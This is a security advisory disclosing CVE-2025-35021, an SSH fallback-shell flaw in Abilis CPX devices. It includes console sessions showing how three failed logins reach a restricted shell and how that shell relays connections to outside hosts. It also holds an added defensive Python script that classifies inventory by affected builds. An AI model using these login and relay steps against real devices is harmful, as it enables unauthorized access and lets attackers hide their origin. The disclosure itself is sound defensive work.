CVE-2025-35021: Abilis CPX Fallback Shell Connection Relay

AHA! has discovered an issue with Abilis CPX devices, and is publishing this disclosure in accordance with runZero’s standard disclosure policy today, November 3, 2025. CVE-2025-35021 has been assigned to this issue. Any questions about this disclosure should be directed to [email protected].

The GCVE identifier for this issue is GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100

Executive Summary

By failing to authenticate three times to an unconfigured Abilis CPX device via SSH, an attacker can log in to a restricted shell on the fourth attempt and, from there, relay connections. This issue is an instance of CWE-1188, ‘Initialization of a Resource with an Insecure Default,’ and is estimated to have a CVSS 3.1 score of 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N). The relevant SSVC vectors for this vulnerability are Exploitation: PoC and Technical Impact: Partial.

Technical Details

A number of Abilis CPX devices drop to a fallback shell after three unsuccessful SSH login attempts if the device has not been configured with an SSH password. That shell permits outbound connections from the device.

In the example console session below, three deliberately incorrect logins (username bad) are submitted to an affected device before the session is dropped to the SSHS prompt.

$ ssh root@[TARGET]
root@TARGET's password:

COM

Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10 - Abilis ID NNNNNNN
Tuesday 19/08/2025 06:07:48 (UTC+02:00) - UpTime 2 days 11:20:42
Login: bad

PERMISSION DENIED

Login: bad

PERMISSION DENIED

Login: bad

PERMISSION DENIED


CLR F0 AE

[192.168.11.002] SSHS>

At this point we are in the SSHS shell. It is a restricted shell, but it can be used to relay connections to other systems. The example below uses the SSHC sub-shell:

[192.168.11.002]help
CP             Open connection to local CP resource
SSH            Open connection to local SSH client
TELNET         Open connection to local TELNET client
<CD>-<UD>      Open X25 call with CD and UD
CLR            Close connection
CLOSE          Close SSH Session
EXIT           Close SSH Session
HELP           Show current help
[192.168.11.002] SSHS>SSH
[192.168.11.002] SSHC>
[192.168.11.002] SSHC>OPEN 8.8.8.8:53
Trying 8.8.8.8:53 ... Open

Version identification fault

Like the SSHC shell, the TELNETC shell offers another path to connection relaying, and it does not require the remote service to complete a particular handshake:

[192.168.11.002] SSHS>TELNET
[192.168.11.002] TELNETC>
[192.168.11.002]TELNETC>open 1.2.3.4:5678
Trying 1.2.3.4:5678 ... Open

Affected Products

Affected versions of CPX devices include:

  • Abilis CPX - Ver. 7.4.10/STD - Build 3608.48
  • Abilis CPX - Ver. 8.10.2/STD - Build 4703.15 - Branch 8.10
  • Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10
  • Abilis CPX - Ver. 8.11.0/STD - Build 4715.15 - Branch 8.11
  • Abilis CPX - Ver. 8.11.11/STD - Build 4715.52 - Branch 8.11
  • Abilis CPX - Ver. 8.11.14/STD - Build 4715.57 - Branch 8.11
  • Abilis CPX - Ver. 8.11.2/STD - Build 4715.19 - Branch 8.11
  • Abilis CPX - Ver. 8.11.5/STD - Build 4715.28 - Branch 8.11
  • Abilis CPX - Ver. 9.0.0/STD - Build 4957.3 - Branch 9.0

Across these devices, affected SSH banners include:

  • SSH-1.99-CPX SSH Server
  • SSH-2.0-CPX SSH Server
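To turn the two lists above into something an asset owner can run over an inventory, here is an added triage script. It is not code from the advisory, from Abilis or from runZero: it parses the version line a CPX device prints at login and the SSH identification string, and classifies each host against the affected builds listed above and the 9.0.7 fixed firmware named in the mitigation section. The inventory entries are constructed sample data (the build number on the 9.0.7 entry is a placeholder), and the "review" status for CPX versions that are neither on the list nor at 9.0.7 or later is an assumption of this script, not a statement from the advisory.

```python
"""Inventory triage for CVE-2025-35021 (Abilis CPX fallback shell).

Added example, not the advisory's or the vendor's code. Sample inventory
lines below are constructed.
"""
import re

# Affected builds exactly as listed in the advisory (version -> build).
AFFECTED_BUILDS = {
    "7.4.10": "3608.48",
    "8.10.2": "4703.15",
    "8.10.4": "4703.26",
    "8.11.0": "4715.15",
    "8.11.11": "4715.52",
    "8.11.14": "4715.57",
    "8.11.2": "4715.19",
    "8.11.5": "4715.28",
    "9.0.0": "4957.3",
}

# Firmware the vendor released with the fix, per the mitigation section.
FIXED_VERSION = (9, 0, 7)

# SSH identification strings the advisory associates with affected devices.
AFFECTED_BANNERS = ("SSH-1.99-CPX SSH Server", "SSH-2.0-CPX SSH Server")

# Matches the "Abilis CPX - Ver. X.Y.Z/STD - Build N.M" prefix of the login line.
VERSION_RE = re.compile(
    r"Abilis CPX - Ver\. (?P<ver>\d+(?:\.\d+)+)/(?P<edition>\w+)"
    r" - Build (?P<build>\d+(?:\.\d+)*)"
)


def parse_cpx_version(line):
    """Return (version, build) from a CPX login line, or None if it is not one."""
    m = VERSION_RE.search(line)
    if not m:
        return None
    return m.group("ver"), m.group("build")


def version_tuple(ver):
    """'8.10.4' -> (8, 10, 4) so versions compare numerically, not lexically."""
    return tuple(int(p) for p in ver.split("."))


def is_cpx_ssh_banner(banner):
    """True if the SSH identification string is one the advisory lists."""
    return banner.strip() in AFFECTED_BANNERS


def classify(line):
    """'affected' (listed build), 'fixed' (>= 9.0.7), 'review' (other CPX), or 'not-cpx'."""
    parsed = parse_cpx_version(line)
    if parsed is None:
        return "not-cpx"
    ver, build = parsed
    if AFFECTED_BUILDS.get(ver) == build:
        return "affected"
    if version_tuple(ver) >= FIXED_VERSION:
        return "fixed"
    # Assumption of this script: a CPX build not on the list and older than
    # the fixed firmware deserves a manual look rather than a clean bill.
    return "review"


# Constructed sample inventory: (host, SSH banner, login banner line).
SAMPLE_INVENTORY = [
    ("10.0.0.1", "SSH-2.0-CPX SSH Server",
     "Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10 - Abilis ID NNNNNNN"),
    ("10.0.0.2", "SSH-2.0-CPX SSH Server",
     "Abilis CPX - Ver. 9.0.7/STD - Build 0000.0 - Branch 9.0"),  # build is a placeholder
    ("10.0.0.3", "SSH-1.99-CPX SSH Server",
     "Abilis CPX - Ver. 8.9.1/STD - Build 4600.1 - Branch 8.9"),  # constructed, not listed
    ("10.0.0.4", "SSH-2.0-OpenSSH_9.6", "Welcome to some other box"),
]


def triage(inventory):
    """Map host -> status. A CPX SSH banner with no parsable version line is 'review'."""
    results = {}
    for host, banner, login_line in inventory:
        status = classify(login_line)
        if status == "not-cpx" and is_cpx_ssh_banner(banner):
            status = "review"
        results[host] = status
    return results


if __name__ == "__main__":
    for host, status in triage(SAMPLE_INVENTORY).items():
        print(f"{host}: {status}")
```

Feed `triage` the banner and login line captured by whatever scanner you already use; the point of matching both version and build is that the advisory lists specific builds, so a version string alone is not enough to call a device affected.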

Mitigation

According to the vendor, setting a password on the SSH service effectively remedies this behavior. Furthermore, firmware version 9.0.7 has been released so that users can no longer accidentally expose what is effectively an unauthenticated relay service.

Attacker Value

By providing a pivot point to relay connections, attackers can use affected CPX devices to effectively shield their true originating IP address when launching attacks against other targets.

Credit

This issue was discovered by HD Moore and disclosure was coordinated by Tod Beardsley through the AHA! CNA.

Timeline